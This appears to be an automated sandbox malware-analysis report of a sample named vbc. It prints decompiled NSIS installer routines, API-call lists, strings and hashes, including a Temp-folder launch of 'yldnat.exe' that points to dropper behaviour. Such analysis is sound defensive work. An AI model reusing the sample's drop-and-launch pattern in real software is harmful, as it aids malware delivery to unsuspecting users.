                                                        							SetWindowLongW(_t127, _t136, _t136);
                                                        							return 1;
                                                        						}
                                                        						DestroyWindow( *0x7a7a78);
                                                        						 *0x7a7a78 = _t122;
                                                        						L60:
                                                        						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
                                                        							ShowWindow(_t127, 0xa);
                                                        							 *0x7a3f88 = 1;
                                                        						}
                                                        						goto L63;
                                                        					} else {
                                                        						asm("sbb eax, eax");
                                                        						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
                                                        						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                        							L28:
                                                        							return E00404631(_a8, _t122, _a16);
                                                        						} else {
                                                        							ShowWindow(_t127, 4);
                                                        							goto L8;
                                                        						}
                                                        					}
                                                        				}
                                                        			}
                                                        0x004040d6
                                                        0x004040dd
                                                        0x00404244
                                                        0x00404248
                                                        0x0040424c
                                                        0x0040424e
                                                        0x00404253
                                                        0x0040425e
                                                        0x00404269
                                                        0x0040426e
                                                        0x00404270
                                                        0x00404272
                                                        0x00404275
                                                        0x0040427a
                                                        0x00404288
                                                        0x00404295
                                                        0x0040429c
                                                        0x0040429c
                                                        0x0040429d
                                                        0x0040429d
                                                        0x004042a2
                                                        0x004042a8
                                                        0x004042af
                                                        0x004042b5
                                                        0x004042b7
                                                        0x004042f7
                                                        0x004042fc
                                                        0x00404301
                                                        0x00404301
                                                        0x00404306
                                                        0x0040430f
                                                        0x00404311
                                                        0x00404316
                                                        0x0040431c
                                                        0x00404320
                                                        0x00404320
                                                        0x00404325
                                                        0x0040432b
                                                        0x00000000
                                                        0x00000000
                                                        0x00404336
                                                        0x0040433c
                                                        0x00000000
                                                        0x00000000
                                                        0x00404345
                                                        0x0040434d
                                                        0x00404352
                                                        0x00404355
                                                        0x0040435b
                                                        0x00404360
                                                        0x00404363
                                                        0x00404369
                                                        0x0040436e
                                                        0x00404371
                                                        0x00404377
                                                        0x0040437f
                                                        0x00404385
                                                        0x0040438b
                                                        0x0040438f
                                                        0x00404396
                                                        0x00404396
                                                        0x00404396
                                                        0x004043a0
                                                        0x004043b2
                                                        0x004043be
                                                        0x004043c3
                                                        0x004043cd
                                                        0x004043d3
                                                        0x004043d5
                                                        0x004043da
                                                        0x004043d7
                                                        0x004043d7
                                                        0x004043d7
                                                        0x004043ea
                                                        0x00404402
                                                        0x00404404
                                                        0x0040440a
                                                        0x0040441f
                                                        0x0040440c
                                                        0x00404415
                                                        0x00404417
                                                        0x00404417
                                                        0x00404425
                                                        0x00404436
                                                        0x0040444c
                                                        0x00404453
                                                        0x00404459
                                                        0x0040445d
                                                        0x00404462
                                                        0x00404464
                                                        0x00000000
                                                        0x0040446a
                                                        0x0040446a
                                                        0x0040446c
                                                        0x00000000
                                                        0x00000000
                                                        0x00404472
                                                        0x00404476
                                                        0x0040449b
                                                        0x004044a1
                                                        0x004044a7
                                                        0x004044a9
                                                        0x00000000
                                                        0x00000000
                                                        0x004044cf
                                                        0x004044d5
                                                        0x004044d7
                                                        0x004044dc
                                                        0x00000000
                                                        0x00000000
                                                        0x004044e2
                                                        0x004044e5
                                                        0x004044e8
                                                        0x004044ff
                                                        0x0040450b
                                                        0x00404524
                                                        0x0040452a
                                                        0x0040452e
                                                        0x00404533
                                                        0x00404539
                                                        0x00000000
                                                        0x00000000
                                                        0x00404543
                                                        0x0040454e
                                                        0x00000000
                                                        0x0040454e
                                                        0x00404478
                                                        0x0040447e
                                                        0x00000000
                                                        0x00000000
                                                        0x00404484
                                                        0x0040448a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404490
                                                        0x00404464
                                                        0x0040455b
                                                        0x00404567
                                                        0x0040456e
                                                        0x00000000
                                                        0x004042b9
                                                        0x004042b9
                                                        0x004042bc
                                                        0x004042ef
                                                        0x004042ef
                                                        0x004042f1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004042f1
                                                        0x004042be
                                                        0x004042c2
                                                        0x004042c7
                                                        0x004042c9
                                                        0x00000000
                                                        0x00000000
                                                        0x004042d9
                                                        0x004042e1
                                                        0x00000000
                                                        0x004042e7
                                                        0x004040ef
                                                        0x004040ef
                                                        0x004040f3
                                                        0x004040f8
                                                        0x00404107
                                                        0x00404107
                                                        0x0040410d
                                                        0x00404114
                                                        0x00404158
                                                        0x0040415e
                                                        0x00404177
                                                        0x0040417a
                                                        0x0040418d
                                                        0x00404193
                                                        0x00000000
                                                        0x00000000
                                                        0x00404199
                                                        0x004041a4
                                                        0x004041a6
                                                        0x004041a8
                                                        0x004041c7
                                                        0x004041c7
                                                        0x004041ca
                                                        0x004041cf
                                                        0x004041d2
                                                        0x004041e2
                                                        0x004041e3
                                                        0x004041e5
                                                        0x0040421b
                                                        0x0040422b
                                                        0x00000000
                                                        0x0040422b
                                                        0x004041e7
                                                        0x004041ed
                                                        0x00404206
                                                        0x0040420b
                                                        0x0040420d
                                                        0x00000000
                                                        0x00000000
                                                        0x0040420f
                                                        0x004041fb
                                                        0x004041fb
                                                        0x004041fd
                                                        0x004041fd
                                                        0x00000000
                                                        0x004041fd
                                                        0x004041f0
                                                        0x004041f5
                                                        0x00000000
                                                        0x004041f5
                                                        0x004041d4
                                                        0x004041da
                                                        0x00000000
                                                        0x00000000
                                                        0x004041dc
                                                        0x00000000
                                                        0x004041dc
                                                        0x004041cc
                                                        0x00000000
                                                        0x004041cc
                                                        0x004041b2
                                                        0x004041b9
                                                        0x004041bf
                                                        0x004041c1
                                                        0x00404597
                                                        0x00000000
                                                        0x00404597
                                                        0x00000000
                                                        0x004041c1
                                                        0x0040417f
                                                        0x00000000
                                                        0x00404187
                                                        0x00404166
                                                        0x0040416c
                                                        0x00404574
                                                        0x0040457a
                                                        0x00404587
                                                        0x0040458d
                                                        0x0040458d
                                                        0x00000000
                                                        0x00404116
                                                        0x0040411b
                                                        0x00404127
                                                        0x00404130
                                                        0x00404231
                                                        0x00000000
                                                        0x0040414f
                                                        0x00404152
                                                        0x00000000
                                                        0x00404152
                                                        0x00404130
                                                        0x00404114

                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
                                                        • ShowWindow.USER32(?), ref: 00404127
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404139
                                                        • ShowWindow.USER32(?,00000004), ref: 00404152
                                                        • DestroyWindow.USER32 ref: 00404166
                                                        • SetWindowLongW.USER32 ref: 0040417F
                                                        • GetDlgItem.USER32(?,?), ref: 0040419E
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
                                                        • IsWindowEnabled.USER32(00000000), ref: 004041B9
                                                        • GetDlgItem.USER32(?,00000001), ref: 00404264
                                                        • GetDlgItem.USER32(?,00000002), ref: 0040426E
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404288
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
                                                        • GetDlgItem.USER32(?,00000003), ref: 0040437F
                                                        • ShowWindow.USER32(00000000,?), ref: 004043A0
                                                        • EnableWindow.USER32(?,?), ref: 004043B2
                                                        • EnableWindow.USER32(?,?), ref: 004043CD
                                                        • GetSystemMenu.USER32 ref: 004043E3
                                                        • EnableMenuItem.USER32 ref: 004043EA
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
                                                        • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
                                                        • SetWindowTextW.USER32 ref: 00404453
                                                        • ShowWindow.USER32(?,0000000A), ref: 00404587
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                        • String ID:
                                                        • API String ID: 1860320154-0
                                                        • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                                                        • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
                                                        • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                                                        • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                         Control-flow Graph
                                                         • Rendered graph omitted (basic blocks 403d1d-403ff2, executed and not-executed paths)
                                                        C-Code - Quality: 96%
                                                        			E00403D1D(void* __eflags) {
                                                        				intOrPtr _v4;
                                                        				intOrPtr _v8;
                                                        				int _v12;
                                                        				void _v16;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				intOrPtr* _t22;
                                                        				void* _t30;
                                                        				void* _t32;
                                                        				int _t33;
                                                        				void* _t36;
                                                        				int _t39;
                                                        				int _t40;
                                                        				int _t44;
                                                        				short _t63;
                                                        				WCHAR* _t65;
                                                        				signed char _t69;
                                                        				WCHAR* _t76;
                                                        				intOrPtr _t82;
                                                        				WCHAR* _t87;
                                                        
                                                        				_t82 =  *0x7a8ab0;
                                                        				_t22 = E00406A3B(2);
                                                        				_t90 = _t22;
                                                        				if(_t22 == 0) {
                                                        					_t76 = 0x7a1f88;
                                                        					L"1033" = 0x30;
                                                        					 *0x7b5002 = 0x78;
                                                        					 *0x7b5004 = 0;
                                                        					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
                                                        					__eflags =  *0x7a1f88;
                                                        					if(__eflags == 0) {
                                                        						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
                                                        					}
                                                        					lstrcatW(L"1033", _t76);
                                                        				} else {
                                                        					E004065B5(L"1033",  *_t22() & 0x0000ffff);
                                                        				}
                                                        				E00403FF3(_t78, _t90);
                                                        				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
                                                        				 *0x7a8b3c = 0x10000;
                                                        				if(E00406045(_t90, 0x7b3800) != 0) {
                                                        					L16:
                                                        					if(E00406045(_t98, 0x7b3800) == 0) {
                                                        						E004066AB(_t76, 0, _t82, 0x7b3800,  *((intOrPtr*)(_t82 + 0x118)));
                                                        					}
                                                        					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040);
                                                        					 *0x7a7a88 = _t30;
                                                        					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                        						L21:
                                                        						if(E0040140B(0) == 0) {
                                                        							_t32 = E00403FF3(_t78, __eflags);
                                                        							__eflags =  *0x7a8b40;
                                                        							if( *0x7a8b40 != 0) {
                                                        								_t33 = E004057A3(_t32, 0);
                                                        								__eflags = _t33;
                                                        								if(_t33 == 0) {
                                                        									E0040140B(1);
                                                        									goto L33;
                                                        								}
                                                        								__eflags =  *0x7a7a6c;
                                                        								if( *0x7a7a6c == 0) {
                                                        									E0040140B(2);
                                                        								}
                                                        								goto L22;
                                                        							}
                                                        							ShowWindow( *0x7a1f68, 5); // executed
                                                        							_t39 = E004069CB("RichEd20"); // executed
                                                        							__eflags = _t39;
                                                        							if(_t39 == 0) {
                                                        								E004069CB("RichEd32");
                                                        							}
                                                        							_t87 = L"RichEdit20W";
                                                        							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
                                                        								 *0x7a7a64 = _t87;
                                                        								RegisterClassW(0x7a7a40);
                                                        							}
                                                        							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
                                                        							E00403C6D(E0040140B(5), 1);
                                                        							return _t44;
                                                        						}
                                                        						L22:
                                                        						_t36 = 2;
                                                        						return _t36;
                                                        					} else {
                                                        						_t78 =  *0x7a8aa0;
                                                        						 *0x7a7a44 = E00401000;
                                                        						 *0x7a7a50 =  *0x7a8aa0;
                                                        						 *0x7a7a54 = _t30;
                                                        						 *0x7a7a64 = 0x40a3b4;
                                                        						if(RegisterClassW(0x7a7a40) == 0) {
                                                        							L33:
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						}
                                                        						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                        						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
                                                        						goto L21;
                                                        					}
                                                        				} else {
                                                        					_t78 =  *(_t82 + 0x48);
                                                        					_t92 = _t78;
                                                        					if(_t78 == 0) {
                                                        						goto L16;
                                                        					}
                                                        					_t76 = 0x7a6a40;
                                                        					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
                                                        					_t63 =  *0x7a6a40; // 0x43
                                                        					if(_t63 == 0) {
                                                        						goto L16;
                                                        					}
                                                        					if(_t63 == 0x22) {
                                                        						_t76 = 0x7a6a42;
                                                        						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
                                                        					}
                                                        					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                        					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                        						L15:
                                                        						E0040666E(0x7b3800, E00405F3D(_t76));
                                                        						goto L16;
                                                        					} else {
                                                        						_t69 = GetFileAttributesW(_t76);
                                                        						if(_t69 == 0xffffffff) {
                                                        							L14:
                                                        							E00405F89(_t76);
                                                        							goto L15;
                                                        						}
                                                        						_t98 = _t69 & 0x00000010;
                                                        						if((_t69 & 0x00000010) != 0) {
                                                        							goto L15;
                                                        						}
                                                        						goto L14;
                                                        					}
                                                        				}
                                                         			}

                                                        APIs
                                                          • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                                                          • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                                                        • lstrcatW.KERNEL32 ref: 00403D9E
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,?,?,?,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,7556D4C4), ref: 00403E1E
                                                        • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,?,?,?,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,?,00000000,?), ref: 00403E3C
                                                        • LoadImageW.USER32 ref: 00403E85
                                                          • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                                                        • RegisterClassW.USER32 ref: 00403EC2
                                                        • SystemParametersInfoW.USER32 ref: 00403EDA
                                                        • CreateWindowExW.USER32 ref: 00403F0F
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403F45
                                                        • GetClassInfoW.USER32 ref: 00403F71
                                                        • GetClassInfoW.USER32 ref: 00403F7E
                                                        • RegisterClassW.USER32 ref: 00403F87
                                                        • DialogBoxParamW.USER32 ref: 00403FA6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                         • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                        • API String ID: 1975747703-2110472897
                                                        • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                                                        • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
                                                        • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                                                        • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                         Control-flow Graph
                                                         • Rendered graph omitted (basic blocks 4030d0-403374, executed and not-executed paths)
                                                        C-Code - Quality: 97%
                                                        			E004030D0(void* __eflags, signed int _a4) {
                                                        				long _v8;
                                                        				long _v12;
                                                        				intOrPtr _v16;
                                                        				long _v20;
                                                        				intOrPtr _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v36;
                                                        				signed int _v40;
                                                        				short _v560;
                                                        				long _t54;
                                                        				void* _t57;
                                                        				void* _t61;
                                                        				intOrPtr _t64;
                                                        				void* _t67;
                                                        				intOrPtr* _t69;
                                                        				long _t81;
                                                        				signed int _t88;
                                                        				intOrPtr _t91;
                                                        				void* _t94;
                                                        				void* _t99;
                                                        				void* _t103;
                                                        				long _t104;
                                                        				long _t107;
                                                        				void* _t108;
                                                        
                                                        				_v8 = 0;
                                                        				_v12 = 0;
                                                        				 *0x7a8aac = GetTickCount() + 0x3e8;
                                                        				GetModuleFileNameW(0, 0x7b6800, 0x400);
                                                        				_t103 = E0040615E(0x7b6800, 0x80000000, 3);
                                                        				 *0x40a018 = _t103;
                                                        				if(_t103 == 0xffffffff) {
                                                        					return L"Error launching installer";
                                                        				}
                                                        				E0040666E(0x7b4800, 0x7b6800);
                                                        				E0040666E(0x7b7000, E00405F89(0x7b4800));
                                                        				_t54 = GetFileSize(_t103, 0);
                                                        				 *0x79f740 = _t54;
                                                        				_t107 = _t54;
                                                        				if(_t54 <= 0) {
                                                        					L22:
                                                        					E0040302E(1);
                                                        					_pop(_t94);
                                                        					if( *0x7a8ab4 == 0) {
                                                        						goto L30;
                                                        					}
                                                        					if(_v12 == 0) {
                                                        						L26:
                                                        						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                        						_t108 = _t57;
                                                        						 *0x40ce78 = 0xb;
                                                        						 *0x40ce90 = 0; // executed
                                                        						E0040618D(_t94,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
                                                        						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                        						 *0x40a01c = _t61;
                                                        						if(_t61 != 0xffffffff) {
                                                        							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
                                                        							 *0x79f744 = _t64;
                                                        							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                        							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
                                                        							if(_t67 == _v20) {
                                                        								 *0x7a8ab0 = _t108;
                                                        								 *0x7a8ab8 =  *_t108;
                                                        								if((_v40 & 0x00000001) != 0) {
                                                        									 *0x7a8abc =  *0x7a8abc + 1;
                                                        								}
                                                        								_t45 = _t108 + 0x44; // 0x44
                                                        								_t69 = _t45;
                                                        								_t99 = 8;
                                                        								do {
                                                        									_t69 = _t69 - 8;
                                                        									 *_t69 =  *_t69 + _t108;
                                                        									_t99 = _t99 - 1;
                                                        								} while (_t99 != 0);
                                                        								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
                                                        								E00406119(0x7a8ac0, _t108 + 4, 0x40);
                                                        								return 0;
                                                        							}
                                                        							goto L30;
                                                        						}
                                                        						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                        					}
                                                        					E004035FE( *0x79f730);
                                                        					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
                                                        						goto L30;
                                                        					} else {
                                                        						goto L26;
                                                        					}
                                                        				} else {
                                                        					do {
                                                        						_t104 = _t107;
                                                        						asm("sbb eax, eax");
                                                        						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
                                                        						if(_t107 >= _t81) {
                                                        							_t104 = _t81;
                                                        						}
                                                        						if(E004035E8(0x797730, _t104) == 0) {
                                                        							E0040302E(1);
                                                        							L30:
                                                        							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                        						}
                                                        						if( *0x7a8ab4 != 0) {
                                                        							if((_a4 & 0x00000002) == 0) {
                                                        								E0040302E(0);
                                                        							}
                                                        							goto L19;
                                                        						}
                                                        						E00406119( &_v40, 0x797730, 0x1c);
                                                        						_t88 = _v40;
                                                        						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                        							_a4 = _a4 | _t88;
                                                        							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
                                                        							_t91 = _v16;
                                                        							 *0x7a8ab4 =  *0x79f730;
                                                        							if(_t91 > _t107) {
                                                        								goto L30;
                                                        							}
                                                        							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                        								_v12 = _v12 + 1;
                                                        								_t107 = _t91 - 4;
                                                        								if(_t104 > _t107) {
                                                        									_t104 = _t107;
                                                        								}
                                                        								goto L19;
                                                        							} else {
                                                        								goto L22;
                                                        							}
                                                        						}
                                                        						L19:
                                                        						if(_t107 <  *0x79f740) {
                                                        							_v8 = E00406B28(_v8, 0x797730, _t104);
                                                        						}
                                                        						 *0x79f730 =  *0x79f730 + _t104;
                                                        						_t107 = _t107 - _t104;
                                                        					} while (_t107 != 0);
                                                        					goto L22;
                                                        				}
                                                        			}

                                                        APIs
                                                        • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004030E4
                                                        • GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400), ref: 00403100
                                                          • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                                          • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                                        • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,007B6800,007B6800,80000000,00000003), ref: 00403149
                                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
                                                        Strings
                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403328
                                                        • Error launching installer, xrefs: 00403120
                                                        • Null, xrefs: 004031C9
                                                        • Inst, xrefs: 004031B7
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 0040329C
                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032DA
                                                        • soft, xrefs: 004031C0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 2803837635-2435864027
                                                        • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                                                        • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
                                                        • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                                                        • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph: entry block 40176f-401794 (call 402da6, call 405fb4); the remaining basic blocks and edges of the graph are not reproduced here.
                                                        C-Code - Quality: 77%
                                                        			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                        				void* __esi;
                                                        				void* _t35;
                                                        				void* _t43;
                                                        				void* _t45;
                                                        				FILETIME* _t51;
                                                        				FILETIME* _t64;
                                                        				void* _t66;
                                                        				signed int _t72;
                                                        				FILETIME* _t73;
                                                        				FILETIME* _t77;
                                                        				signed int _t79;
                                                        				WCHAR* _t81;
                                                        				void* _t83;
                                                        				void* _t84;
                                                        				void* _t86;
                                                        
                                                        				_t77 = __ebx;
                                                        				 *(_t86 - 8) = E00402DA6(0x31);
                                                        				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                        				_t35 = E00405FB4( *(_t86 - 8));
                                                        				_push( *(_t86 - 8));
                                                        				_t81 = L"C:\\U";
                                                        				if(_t35 == 0) {
                                                        					lstrcatW(E00405F3D(E0040666E(_t81, 0x7b4000)), ??);
                                                        				} else {
                                                        					E0040666E();
                                                        				}
                                                        				E004068F5(_t81);
                                                        				while(1) {
                                                        					__eflags =  *(_t86 + 8) - 3;
                                                        					if( *(_t86 + 8) >= 3) {
